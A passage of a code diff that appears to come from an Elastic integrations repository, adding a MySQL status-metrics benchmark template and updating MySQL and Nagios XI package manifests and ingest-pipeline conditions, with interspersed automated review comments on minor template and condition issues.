@@ -0,0 +1,333 @@ +fields: + - name: timestamp + period: 60m #one hour + - name: EventDuration + range: + min: 1 + max: 1000 + - name: service_address + enum: ["elastic-package-service_mysql_1", "elastic-package-service_mysql_2", "elastic-package-service_mysql_3"] + - name: aborted_clients + range: + min: 1 + max: 1000 + - name: aborted_connects + range: + min: 1 + max: 1000 + - name: errors_peer_address + range: + min: 1 + max: 1000 + - name: errors_accept + range: + min: 1 + max: 1000 + - name: errors_internal + range: + min: 1 + max: 1000 + - name: errors_max + range: + min: 1 + max: 1000 + - name: errors_tcpwrap + range: + min: 1 + max: 1000 + - name: errors_select + range: + min: 1 + max: 1000 + - name: ssl_hits + range: + min: 1 + max: 1000 + - name: ssl_misses + range: + min: 1 + max: 1000 + - name: ssl_size + range: + min: 1 + max: 1000 + - name: open_hits + range: + min: 100000 + max: 1000000 + - name: open_misses + range: + min: 1 + max: 1000 + - name: open_overflows + range: + min: 1 + max: 1000 + - name: disk_use + range: + min: 1 + max: 1000 + - name: use + range: + min: 1 + max: 1000 + - name: bytes_received + range: + min: 10000000 + max: 100000000 + - name: bytes_sent + range: + min: 10000000 + max: 100000000 + - name: threads_cached + range: + min: 1 + max: 1000 + - name: threads_created + range: + min: 1 + max: 1000 + - name: threads_connected + range: + min: 1 + max: 1000 + - name: threads_running + range: + min: 1 + max: 1000 + - name: tmp_disk_tables + range: + min: 1 + max: 1000 + - name: tmp_files + range: + min: 1 + max: 1000 + - name: tmp_tables + range: + min: 10000 + max: 100000 + - name: errors + range: + min: 1 + max: 1000 + - name: insert_threads + range: + min: 1 + max: 1000 + - name: writes + range: + min: 1 + max: 1000 + - name: flush_commands + range: + min: 1 + max: 1000 + - name: max_used_connections + range: + min: 10 + max: 100 + - name: open_files + range: + min: 1 + max: 1000 + - name: open_streams + range: + min: 1 + max: 
1000 + - name: open_tables + range: + min: 1 + max: 1000 + - name: opened_tables + range: + min: 1 + max: 1000 + - name: connections + range: + min: 1 + max: 9 + - name: command_delete + range: + min: 1 + max: 1000 + - name: command_insert + range: + min: 1 + max: 1000 + - name: command_select + range: + min: 1 + max: 100000 + - name: command_update + range: + min: 1 + max: 1000 + - name: queries + range: + min: 1 + max: 100000 + - name: questions + range: + min: 1 + max: 100000 + - name: commit + range: + min: 1 + max: 1000 + - name: delete + range: + min: 1 + max: 1000 + - name: external_lock + range: + min: 100000 + max: 1000000 + - name: mrr_init + range: + min: 1 + max: 1000 + - name: prepare + range: + min: 1 + max: 1000 + - name: read_first + range: + min: 1 + max: 1000 + - name: read_key + range: + min: 1000 + max: 10000 + - name: read_last + range: + min: 1 + max: 1000 + - name: read_next + range: + min: 1 + max: 1000 + - name: read_prev + range: + min: 1000 + max: 10000 + - name: read_rnd + range: + min: 100000 + max: 1000000 + - name: read_rnd_next + range: + min: 10000000 + max: 100000000 + - name: rollback + range: + min: 1 + max: 1000 + - name: savepoint + range: + min: 1 + max: 1000 + - name: savepoint_rollback + range: + min: 1 + max: 1000 + - name: update + range: + min: 1 + max: 1000 + - name: write + range: + min: 10000000 + max: 100000000 + - name: rows_read + range: + min: 1 + max: 1000 + - name: rows_inserted + range: + min: 1 + max: 1000 + - name: rows_deleted + range: + min: 1 + max: 1000 + - name: rows_updated + range: + min: 1 + max: 1000 + - name: dump_status + range: + min: 1 + max: 1000 + - name: load_status + range: + min: 1 + max: 1000 + - name: bytes_data + range: + min: 10000000 + max: 100000000 + - name: bytes_dirty + range: + min: 1 + max: 1000 + - name: pages_data + range: + min: 1000 + max: 10000 + - name: pages_dirty + range: + min: 1 + max: 1000 + - name: pages_flushed + range: + min: 1 + max: 1000 + - name: pages_free + 
range: + min: 1 + max: 1000 + - name: pages_latched + range: + min: 1 + max: 1000 + - name: pages_misc + range: + min: 1 + max: 1000 + - name: pages_total + range: + min: 1001 + max: 10000 + - name: read_ahead + range: + min: 1000 + max: 10000 + - name: read_ahead_evicted + range: + min: 1 + max: 1000 + - name: read_ahead_rnd + range: + min: 1 + max: 1000 + - name: read_requests + range: + min: 10000 + max: 100000 + - name: pool_reads + range: + min: 10000 + max: 100000 + - name: pool_resize_status + range: + min: 10000 + max: 100000 + - name: pool_wait_free + range: + min: 1 + max: 1000 + - name: write_requests + range: + min: 1000 + max: 10000 diff --git a/packages/mysql/_dev/benchmark/rally/status-benchmark/fields.yml b/packages/mysql/_dev/benchmark/rally/status-benchmark/fields.yml new file mode 100644 index 00000000000..da198893879 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/status-benchmark/fields.yml 
@@ -0,0 +1,172 @@ +- name: agent_ephemeral_id + type: keyword +- name: agent_name + type: keyword +- name: EventDuration + type: long +- name: service_address + type: keyword +- name: timestamp + type: date +- name: aborted_clients + type: long +- name: aborted_connects + type: long +- name: errors_peer_address + type: long +- name: errors_accept + type: long +- name: errors_internal + type: long +- name: errors_max + type: long +- name: errors_tcpwrap + type: long +- name: errors_select + type: long +- name: ssl_hits + type: long +- name: ssl_misses + type: long +- name: ssl_size + type: long +- name: open_hits + type: long +- name: open_misses + type: long +- name: open_overflows + type: long +- name: disk_use + type: long +- name: use + type: long +- name: bytes_received + type: long +- name: bytes_sent + type: long +- name: threads_cached + type: long +- name: threads_created + type: long +- name: threads_connected + type: long +- name: threads_running + type: long +- name: tmp_disk_tables + type: long +- name: tmp_files + type: long +- name: tmp_tables + type: long +- name: errors + type: long +- name: insert_threads + type: long +- name: writes + type: long +- name: flush_commands + type: long +- name: max_used_connections + type: long +- name: open_files + type: long +- name: open_streams + type: long +- name: open_tables + type: long +- name: opened_tables + type: long +- name: connections + type: long +- name: command_delete + type: long +- name: command_insert + type: long +- name: command_select + type: long +- name: command_update + type: long +- name: queries + type: long +- name: questions + type: long +- name: commit + type: long +- name: delete + type: long +- name: external_lock + type: long +- name: mrr_init + type: long +- name: prepare + type: long +- name: read_first + type: long +- name: read_key + type: long +- name: read_last + type: long +- name: read_next + type: long +- name: read_prev + type: long +- name: read_rnd + type: long +- name: 
read_rnd_next + type: long +- name: rollback + type: long +- name: savepoint + type: long +- name: savepoint_rollback + type: long +- name: update + type: long +- name: write + type: long +- name: rows_read + type: long +- name: rows_inserted + type: long +- name: rows_deleted + type: long +- name: rows_updated + type: long +- name: dump_status + type: long +- name: load_status + type: long +- name: bytes_data + type: long +- name: bytes_dirty + type: long +- name: pages_data + type: long +- name: pages_dirty + type: long +- name: pages_flushed + type: long +- name: pages_free + type: long +- name: pages_latched + type: long +- name: pages_misc + type: long +- name: pages_total + type: long +- name: read_ahead + type: long +- name: read_ahead_evicted + type: long +- name: read_ahead_rnd + type: long +- name: read_requests + type: long +- name: pool_reads + type: long +- name: pool_resize_status + type: long +- name: pool_wait_free + type: long +- name: write_requests + type: long diff --git a/packages/mysql/_dev/benchmark/rally/status-benchmark/template.ndjson b/packages/mysql/_dev/benchmark/rally/status-benchmark/template.ndjson new file mode 100644 index 00000000000..126e2f7dad7 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/status-benchmark/template.ndjson 
@@ -0,0 +1,244 @@
+{{- $timestamp := generate "timestamp" }}
+{{- $agent_name := generate "agent_name" }}
+{{- $agent_ephemeral_id := generate "agent_ephemeral_id" }}
+{{- $EventDuration := generate "EventDuration" }}
+{{- $service_address := generate "service_address" }}
+{{- $aborted_clients := generate "aborted_clients" }}
+{{- $aborted_connects := generate "aborted_connects" }}
+{{- $errors_peer_address := generate "errors_peer_address" }}
+{{- $errors_accept := generate "errors_accept" }}
+{{- $errors_internal := generate "errors_internal" }}
+{{- $errors_max := generate "errors_max" }}
+{{- $errors_tcpwrap := generate "errors_tcpwrap" }}
+{{- $errors_select := generate "errors_select" }}
+{{- $ssl_hits := generate "ssl_hits" }}
+{{- $ssl_misses := generate "ssl_misses" }}
+{{- $ssl_size := generate "ssl_size" }}
+{{- $open_hits := generate "open_hits" }}
+{{- $open_misses := generate "open_misses" }}
+{{- $open_overflows := generate "open_overflows" }}
+{{- $disk_use := generate "disk_use" }}
+{{- $use := generate "use" }}
+{{- $bytes_received := generate "bytes_received" }}
+{{- $bytes_sent := generate "bytes_sent" }}
+{{- $threads_running := generate "threads_running" }}
+{{- $threads_cached := generate "threads_cached" }}
+{{- $threads_created := generate "threads_created" }}
+{{- $threads_connected := generate "threads_connected" }}
+{{- $tmp_disk_tables := generate "tmp_disk_tables" }}
+{{- $tmp_files := generate "tmp_files" }}
+{{- $tmp_tables := generate "tmp_tables" }}
+{{- $errors := generate "errors" }}
+{{- $insert_threads := generate "insert_threads" }}
+{{- $writes := generate "writes" }}
+{{- $flush_commands := generate "flush_commands" }}
+{{- $max_used_connections := generate "max_used_connections" }}
+{{- $open_files := generate "open_files" }}
+{{- $open_streams := generate "open_streams" }}
+{{- $open_tables := generate "open_tables" }}
+{{- $opened_tables := generate "opened_tables" }}
+{{- $connections := generate "connections" }}
+{{- $command_delete := generate "command_delete" }}
+{{- $command_insert := generate "command_insert" }}
+{{- $command_select := generate "command_select" }}
+{{- $command_update := generate "command_update" }}
+{{- $queries := generate "queries" }}
+{{- $questions := generate "questions" }}
+{{- $commit := generate "commit" }}
+{{- $delete := generate "delete" }}
+{{- $external_lock := generate "external_lock" }}
+{{- $mrr_init := generate "mrr_init" }}
+{{- $prepare := generate "prepare" }}
+{{- $read_first := generate "read_first" }}
+{{- $read_key := generate "read_key" }}
+{{- $read_last := generate "read_last" }}
+{{- $read_next := generate "read_next" }}
+{{- $read_prev := generate "read_prev" }}
+{{- $read_rnd := generate "read_rnd" }}
+{{- $read_rnd_next := generate "read_rnd_next" }}
+{{- $rollback := generate "rollback" }}
+{{- $savepoint := generate "savepoint" }}
+{{- $savepoint_rollback := generate "savepoint_rollback" }}
+{{- $update := generate "update" }}
+{{- $write := generate "write" }}
+{{- $rows_read := generate "rows_read" }}
+{{- $rows_inserted := generate "rows_inserted" }}
+{{- $rows_deleted := generate "rows_deleted" }}
+{{- $rows_updated := generate "rows_updated" }}
+{{- $dump_status := generate "dump_status" }}
+{{- $load_status := generate "load_status" }}
+{{- $bytes_data := generate "bytes_data" }}
+{{- $bytes_dirty := generate "bytes_dirty" }}
+{{- $pages_data := generate "pages_data" }}
+{{- $pages_dirty := generate "pages_dirty" }}
+{{- $pages_flushed := generate "pages_flushed" }}
+{{- $pages_free := generate "pages_free" }}
+{{- $pages_latched := generate "pages_latched" }}
+{{- $pages_misc := generate "pages_misc" }}
+{{- $pages_total := generate "pages_total" }}
+{{- $read_ahead := generate "read_ahead" }}
+{{- $read_ahead_evicted := generate "read_ahead_evicted" }}
+{{- $read_ahead_rnd := generate "read_ahead_rnd" }}
+{{- $read_requests := generate "read_requests" }}
+{{- $pool_reads := generate "pool_reads" }}
+{{- $pool_resize_status := generate "pool_resize_status" }}
+{{- $pool_wait_free := generate "pool_wait_free" }}
+{{- $write_requests := generate "write_requests" }}
+{
+ "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}",
+ "mysql": {
+ "status": {
+ "max_used_connections": {{ $max_used_connections }},
+ "queries": {{ $queries }},
+ "handler": {
+ "prepare": {{ $prepare }},
+ "savepoint": {{ $savepoint }},
+ "update": {{ $update }},
+ "delete": {{ $delete }},
+ "read": {
+ "rnd_next": {{ $read_rnd_next }},
+ "first": {{ $read_first }},
+ "key": {{ $read_key }},
+ "last": {{ $read_last }},
+ "next": {{ $read_next }},
+ "prev": {{ $read_prev }},
+ "rnd": {{ $read_rnd }}
+ },
+ "rollback": {{ $rollback }},
+ "write": {{ $write }},
+ "commit": {{ $commit }},
+ "savepoint_rollback": {{ $savepoint_rollback }},
+ "external_lock": {{ $external_lock }},
+ "mrr_init": {{ $mrr_init }}
+ },
+ "aborted": {
+ "clients": {{ $aborted_clients }},
+ "connects": {{ $aborted_connects }}
+ },
+ "errors": {
+ "peer_address": {{ $errors_peer_address }},
+ "accept": {{ $errors_accept }},
+ "internal": {{ $errors_internal }},
+ "max": {{ $errors_max }},
+ "tcpwrap": {{ $errors_tcpwrap }},
+ "select": {{ $errors_select }}
+ },
+ "ssl": {
+ "hits": {{ $ssl_hits }},
+ "misses": {{ $ssl_misses }},
+ "size": {{ $ssl_size }}
+ },
+ "open": {
+ "hits": {{ $open_hits }},
+ "misses": {{ $open_misses }},
+ "overflows": {{ $open_overflows }},
+ "streams": {{ $open_streams }},
+ "tables": {{ $open_tables }},
+ "files": {{ $open_files }}
+ },
+ "threads": {
+ "running": {{ $threads_running }},
+ "cached": {{ $threads_cached }},
+ "created": {{ $threads_created }},
+ "connected": {{ $threads_connected }}
+ },
+ "flush_commands": {{ $flush_commands }},
+ "created": {
+ "tmp": {
+ "disk_tables": {{ $tmp_disk_tables }},
+ "files": {{ $tmp_files }} ,
+ "tables": {{ $tmp_tables }}
+ }
+ },
+ "connections": {{ $connections }},
+ "command": {
+ "insert": {{ $command_insert }} ,
+ "select": {{ $command_select }},
+ "update": {{ $command_update }},
+ "delete": {{ $command_delete }}
+ },
+ "opened_tables": {{ $opened_tables }},
+ "binlog": {
+ "cache": {
+ "use": {{ $use }} ,
+ "disk_use": {{ $disk_use }}
+ }
+ },
+ "delayed": {
+ "writes": {{ $writes }},
+ "errors": {{ $errors }},
+ "insert_threads": {{ $insert_threads }}
+ },
+ "questions": {{ $questions }},
+ "innodb": {
+ "buffer_pool": {
+ "rows": {
+ "read": {{ $rows_read }},
+ "inserted": {{ $rows_inserted }},
+ "deleted": {{ $rows_deleted }},
+ "updated": {{ $rows_updated }}
+ },
+ "dump_status": {{ $dump_status }},
+ "load_status": {{ $load_status }},
+ "read": {
+ "ahead_rnd": {{ $read_ahead_rnd }},
+ "requests": {{ $read_requests }},
+ "ahead": {{ $read_ahead }},
+ "ahead_evicted": {{ $read_ahead_evicted }}
+ },
+ "pool": {
+ "wait_free": {{ $pool_wait_free }} ,
+ "reads": {{ $pool_reads }},
+ "resize_status": {{ $pool_resize_status }}
+ },
+ "write_requests": {{ $write_requests }},
+ "bytes": {
+ "data": {{ $bytes_data }},
+ "dirty": {{ $bytes_dirty }}
+ },
+ "pages": {
+ "dirty": {{ $pages_dirty }},
+ "flushed": {{ $pages_flushed }},
+ "free": {{ $pages_free }},
+ "misc": {{ $pages_misc }},
+ "total": {{ $pages_total }},
+ "data": {{ $pages_data }}
+ }
+ }
+ },
+ "bytes": {
+ "received": {{ $bytes_received }},
+ "sent": {{ $bytes_sent }}
+ }
+ }
+ },
+ "event": {
+ "dataset": "mysql.status",
+ "module": "mysql",
+ "duration": {{ generate "EventDuration" }}
+ },
+ "data_stream": {
+ "dataset": "mysql.status",
+ "namespace": "ep",
+ "type": "metrics"
+ },
+ "metricset": {
+ "name": "status",
+ "period": 10000
+ },
+ "ecs": {
+ "version": "8.5.0"
+ },
+ "agent": {
+ "id": "ede0be38-46a9-4ffc-8f1e-2ff9195193b6",
+ "version": "8.8.0",
+ "type": "metricbeat",
+ "name": "{{ $agent_name }}",
+ "ephemeral_id": "{{ $agent_ephemeral_id }}",
+ "hostname": "docker-fleet-agent"
+ },
+ "service": {
+ "address": "{{ $service_address }}:3306",
+ "type": "mysql"
+ }
+}
\ No newline at end of file
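Review bot: `event.duration` at the end of the template calls `generate "EventDuration"` a second time while `$EventDuration`, assigned at the top of the file, is never emitted, so the two values are independent draws; `"duration": {{ $EventDuration }}` uses the one already generated, or the unused assignment can be dropped. `$pages_latched` is likewise generated but never written into the document. The space before the comma in `{{ $tmp_files }} ,`, `{{ $command_insert }} ,`, `{{ $use }} ,` and `{{ $pool_wait_free }} ,` is harmless JSON but inconsistent with the rest of the file.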
diff --git a/packages/mysql/changelog.yml b/packages/mysql/changelog.yml
index fc7c8ee318f..a7f3b630e99 100644
--- a/packages/mysql/changelog.yml
+++ b/packages/mysql/changelog.yml
@@ -1,4 +1,24 @@
 # newer versions go on top
+- version: 1.19.0
+ changes:
+ - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9321
+- version: 1.18.2
+ changes:
+ - description: Disable secrets for older stack versions due to errors.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9279
+- version: 1.18.1
+ changes:
+ - description: Add missing dimension to the performance datastream.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9219
+- version: 1.18.0
+ changes:
+ - description: Enable 'secret' for the sensitive fields, supported from 8.12.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9009
 - version: 1.17.0
 changes:
 - description: Add support for tags, processors and the preserve_original_event to the error and slowlog datastreams.
diff --git a/packages/mysql/data_stream/performance/fields/fields.yml b/packages/mysql/data_stream/performance/fields/fields.yml
index bbdba5fc68d..9e3c110b980 100644
--- a/packages/mysql/data_stream/performance/fields/fields.yml
+++ b/packages/mysql/data_stream/performance/fields/fields.yml
@@ -49,6 +49,8 @@
 description: Table name
 - name: index.name
 type: keyword
+ # To support multiple index names
+ dimension: true
 description: |
 Name of the index that was used when the table I/O wait event was recorded. PRIMARY indicates that table I/O used the primary index. NULL means that table I/O used no index. Inserts are counted against INDEX_NAME = NULL
 - name: count.fetch
diff --git a/packages/mysql/manifest.yml b/packages/mysql/manifest.yml
index 3d34b8d4133..e77e975c1e2 100644
--- a/packages/mysql/manifest.yml
+++ b/packages/mysql/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: mysql
 title: MySQL
-version: "1.17.0"
+version: "1.19.0"
 description: Collect logs and metrics from MySQL servers with Elastic Agent.
 type: integration
 categories:
@@ -9,7 +9,7 @@ categories:
 - observability
 conditions:
 kibana:
- version: "^8.8.2"
+ version: "^8.12.0"
 elastic:
 subscription: basic
 screenshots:
@@ -53,6 +53,7 @@ policy_templates:
 - name: password
 type: password
 title: Password
+ secret: true
 default: test
 owner:
 github: elastic/obs-infraobs-integrations
diff --git a/packages/nagios_xi/changelog.yml b/packages/nagios_xi/changelog.yml
index 709b29d7b8e..a5310b24781 100644
--- a/packages/nagios_xi/changelog.yml
+++ b/packages/nagios_xi/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.1"
+ changes:
+ - description: Fix ingest pipeline conditional field handling.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9003
 - version: "1.2.0"
 changes:
 - description: Limit request tracer log count to five.
diff --git a/packages/nagios_xi/data_stream/events/elasticsearch/ingest_pipeline/default.yml b/packages/nagios_xi/data_stream/events/elasticsearch/ingest_pipeline/default.yml
index e7a7b752721..98bd28740d8 100644
--- a/packages/nagios_xi/data_stream/events/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/nagios_xi/data_stream/events/elasticsearch/ingest_pipeline/default.yml
@@ -102,7 +102,7 @@ processors:
 - remove:
 field: event.original
- if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+ if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))"
 ignore_failure: true
 ignore_missing: true
diff --git a/packages/nagios_xi/data_stream/host/elasticsearch/ingest_pipeline/default.yml b/packages/nagios_xi/data_stream/host/elasticsearch/ingest_pipeline/default.yml
index 13b4afc11ce..ad904ec33dd 100644
--- a/packages/nagios_xi/data_stream/host/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/nagios_xi/data_stream/host/elasticsearch/ingest_pipeline/default.yml
@@ -259,25 +259,25 @@ processors:
 value: Up/Pending
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.json?.current_state?.contains("0")
+ if: ctx.json?.current_state?.contains("0") == true
 - set:
 field: nagios_xi.host.current_state
 value: Warning
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.json?.current_state?.contains("1")
+ if: ctx.json?.current_state?.contains("1") == true
 - set:
 field: nagios_xi.host.current_state
 value: Critical
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.json?.current_state?.contains("2")
+ if: ctx.json?.current_state?.contains("2") == true
 - set:
 field: nagios_xi.host.current_state
 value: Unknown
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.json?.current_state?.contains("3")
+ if: ctx.json?.current_state?.contains("3") == true
 - rename:
 field: json.has_been_checked
 target_field: nagios_xi.host.has_been_checked
@@ -447,7 +447,7 @@ processors:
 drop(ctx);
 - remove:
 field: event.original
- if: ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))
+ if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))
 ignore_failure: true
 ignore_missing: true
 - remove:
diff --git a/packages/nagios_xi/data_stream/service/elasticsearch/ingest_pipeline/default.yml b/packages/nagios_xi/data_stream/service/elasticsearch/ingest_pipeline/default.yml
index 776a310d272..081987ed292 100644
--- a/packages/nagios_xi/data_stream/service/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/nagios_xi/data_stream/service/elasticsearch/ingest_pipeline/default.yml
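Review bot: The rewritten conditions still pick the state label by substring, `ctx.json?.current_state?.contains("0") == true`, and the four `set` processors run in sequence with the last match winning, so a `current_state` value that contains more than one of the digits would be labelled by the later processor. If `current_state` is the single-digit Nagios state code (presumably a string here), an equality test such as `ctx.json?.current_state == "0"` states the intent exactly and needs no `== true` coercion; the service pipeline hunk `@@ -239,25 +239,25 @@` has the same shape. The processors list continues outside the hunk.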
@@ -239,25 +239,25 @@ processors:
 value: Up/Pending
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.json?.current_state?.contains("0")
+ if: ctx.json?.current_state?.contains("0") == true
 - set:
 field: nagios_xi.service.current_state
 value: Warning
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.json?.current_state?.contains("1")
+ if: ctx.json?.current_state?.contains("1") == true
 - set:
 field: nagios_xi.service.current_state
 value: Critical
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.json?.current_state?.contains("2")
+ if: ctx.json?.current_state?.contains("2") == true
 - set:
 field: nagios_xi.service.current_state
 value: Unknown
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.json?.current_state?.contains("3")
+ if: ctx.json?.current_state?.contains("3") == true
 - rename:
 field: json.has_been_checked
 target_field: nagios_xi.service.has_been_checked
@@ -395,13 +395,13 @@ processors:
 override: true
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.check_command?.contains("check_local_users")
+ if: ctx.nagios_xi?.service?.check_command?.contains("check_local_users") == true
 - dissect:
 field: nagios_xi.service.current_users.performance_data
 pattern: users=%{nagios_xi.service.current_users.users};%{}
 ignore_missing: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("current_users")
+ if: ctx.nagios_xi?.service?.containsKey("current_users") == true
 - convert:
 field: nagios_xi.service.current_users.users
 type: double
@@ -412,7 +412,7 @@ processors:
 value: nagios_xi.current_users
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("current_users")
+ if: ctx.nagios_xi?.service?.containsKey("current_users") == true
 - set:
 copy_from: nagios_xi.service.temp
@@ -420,13 +420,13 @@ processors:
 override: true
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.check_command?.contains("check_local_load")
+ if: ctx.nagios_xi?.service?.check_command?.contains("check_local_load") == true
 - dissect:
 field: nagios_xi.service.current_load.performance_data
 pattern: load1=%{nagios_xi.service.current_load.load1};%{?}load5=%{nagios_xi.service.current_load.load5};%{?}load15=%{nagios_xi.service.current_load.load15};%{?}
 ignore_missing: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("current_load")
+ if: ctx.nagios_xi?.service?.containsKey("current_load") == true
 - convert:
 field: nagios_xi.service.current_load.load1
 type: double
@@ -447,7 +447,7 @@ processors:
 value: nagios_xi.current_load
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("current_load")
+ if: ctx.nagios_xi?.service?.containsKey("current_load") == true
 - set:
 copy_from: nagios_xi.service.temp
@@ -455,13 +455,17 @@ processors:
 override: true
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.check_command?.contains("check_ssh") || ctx?.nagios_xi?.service?.check_command?.contains("check_xi_service_ssh")
+ if: >-
+ ctx.nagios_xi?.service?.check_command != null && (
+ ctx.nagios_xi.service.check_command?.contains("check_ssh") ||
+ ctx.nagios_xi.service.check_command?.contains("check_xi_service_ssh")
+ )
 - dissect:
 field: nagios_xi.service.ssh.performance_data
 pattern: time=%{nagios_xi.service.ssh.time}s%{}
 ignore_missing: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("ssh")
+ if: ctx.nagios_xi?.service?.containsKey("ssh") == true
 - convert:
 field: nagios_xi.service.ssh.time
 type: double
@@ -472,7 +476,7 @@ processors:
 value: nagios_xi.ssh
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("ssh")
+ if: ctx.nagios_xi?.service?.containsKey("ssh") == true
 - set:
 copy_from: nagios_xi.service.temp
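Review bot: In the `check_ssh` condition the `ctx.nagios_xi?.service?.check_command != null` guard already establishes that `check_command` is non-null, so the `?.` on the two `check_command?.contains(...)` calls inside the parentheses is redundant and `ctx.nagios_xi.service.check_command.contains("check_ssh") ||` reads truer to the guard. The `check_ping` and `check_http` conditions in the later hunks `@@ -480,13 +484,17 @@` and `@@ -571,13 +579,17 @@` follow the same pattern. A short comment on why these three use the `!= null && (...)` form while the single-`contains` conditions nearby use `?.contains(...) == true` would help the next reader, e.g. `# two substring tests: guard once so a missing check_command never reaches the ||` if that is indeed the reason.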
@@ -480,13 +484,17 @@ processors:
 override: true
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.check_command?.contains("check_ping") || ctx?.nagios_xi?.service?.check_command?.contains("check_xi_service_ping")
+ if: >-
+ ctx.nagios_xi?.service?.check_command != null && (
+ ctx.nagios_xi.service.check_command?.contains("check_ping") ||
+ ctx.nagios_xi.service.check_command?.contains("check_xi_service_ping")
+ )
 - dissect:
 field: nagios_xi.service.ping.performance_data
 pattern: rta=%{nagios_xi.service.ping.rta}ms;%{?}pl=%{nagios_xi.service.ping.pl}%;%{?}
 ignore_missing: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("ping")
+ if: ctx.nagios_xi?.service?.containsKey("ping") == true
 - convert:
 field: nagios_xi.service.ping.rta
 type: double
@@ -502,7 +510,7 @@ processors:
 value: nagios_xi.ping
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("ping")
+ if: ctx.nagios_xi?.service?.containsKey("ping") == true
 - set:
 copy_from: nagios_xi.service.temp
@@ -510,13 +518,13 @@ processors:
 override: true
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.check_command?.contains("check_local_swap")
+ if: ctx.nagios_xi?.service?.check_command?.contains("check_local_swap") == true
 - dissect:
 field: nagios_xi.service.swap_usage.performance_data
 pattern: swap=%{nagios_xi.service.swap_usage.free_swap}MB;%{};%{};%{};%{nagios_xi.service.swap_usage.total_swap}
 ignore_missing: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("swap_usage")
+ if: ctx.nagios_xi?.service?.containsKey("swap_usage") == true
 - convert:
 field: nagios_xi.service.swap_usage.free_swap
 type: long
@@ -529,7 +537,7 @@ processors:
 ignore_failure: true
 - script:
 source: |
- if(ctx?.nagios_xi?.service?.containsKey("swap_usage")) {
+ if(ctx.nagios_xi?.service?.containsKey("swap_usage") == true) {
 ctx.nagios_xi.service.swap_usage.used_swap = ctx.nagios_xi.service.swap_usage.total_swap - ctx.nagios_xi.service.swap_usage.free_swap
 }
 ignore_failure: true
@@ -538,7 +546,7 @@ processors:
 value: nagios_xi.swap_usage
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("swap_usage")
+ if: ctx.nagios_xi?.service?.containsKey("swap_usage") == true
 - set:
 copy_from: nagios_xi.service.temp
@@ -546,13 +554,13 @@ processors:
 override: true
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.check_command?.contains("check_local_procs")
+ if: ctx.nagios_xi?.service?.check_command?.contains("check_local_procs") == true
 - dissect:
 field: nagios_xi.service.process.performance_data
 pattern: procs=%{nagios_xi.service.process.total};%{}
 ignore_missing: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("process")
+ if: ctx.nagios_xi?.service?.containsKey("process") == true
 - convert:
 field: nagios_xi.service.process.total
 type: double
@@ -563,7 +571,7 @@ processors:
 value: nagios_xi.process
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("process")
+ if: ctx.nagios_xi?.service?.containsKey("process") == true
 - set:
 copy_from: nagios_xi.service.temp
@@ -571,13 +579,17 @@ processors:
 override: true
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.check_command?.contains("check_http") || ctx?.nagios_xi?.service?.check_command?.contains("check_xi_service_http")
+ if: >-
+ ctx.nagios_xi?.service?.check_command != null && (
+ ctx.nagios_xi.service.check_command?.contains("check_http") ||
+ ctx.nagios_xi.service.check_command?.contains("check_xi_service_http")
+ )
 - dissect:
 field: nagios_xi.service.http.performance_data
 pattern: time=%{nagios_xi.service.http.time}s;;;%{?un}size=%{nagios_xi.service.http.size}B;%{?}
 ignore_missing: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("http")
+ if: ctx.nagios_xi?.service?.containsKey("http") == true
 - convert:
 field: nagios_xi.service.http.time
 type: double
@@ -593,7 +605,7 @@ processors:
 value: nagios_xi.http
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("http")
+ if: ctx.nagios_xi?.service?.containsKey("http") == true
 - set:
 copy_from: nagios_xi.service.temp
